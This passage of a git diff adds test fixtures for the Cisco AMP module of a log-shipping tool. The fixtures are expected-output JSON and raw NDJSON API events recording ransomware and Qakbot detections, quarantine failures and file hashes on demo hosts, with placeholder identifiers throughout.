"cisco.amp.timestamp_nanoseconds": 50000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769885", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53134, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": 
"Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 34000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 54407, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802584", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Quarantine Failure", + "event.category": [ 
+ "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 55679, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802583", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 56872, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802582", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 58065, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + 
{ + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802581", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 59258, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 
800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 60451, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 644000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": 
"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 61637, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4688, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + 
"fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63166, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 64439, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + 
"@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204901661835277", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 802000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 65559, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log new file mode 100644 index 00000000000..9842f3cbe93 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log 
@@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
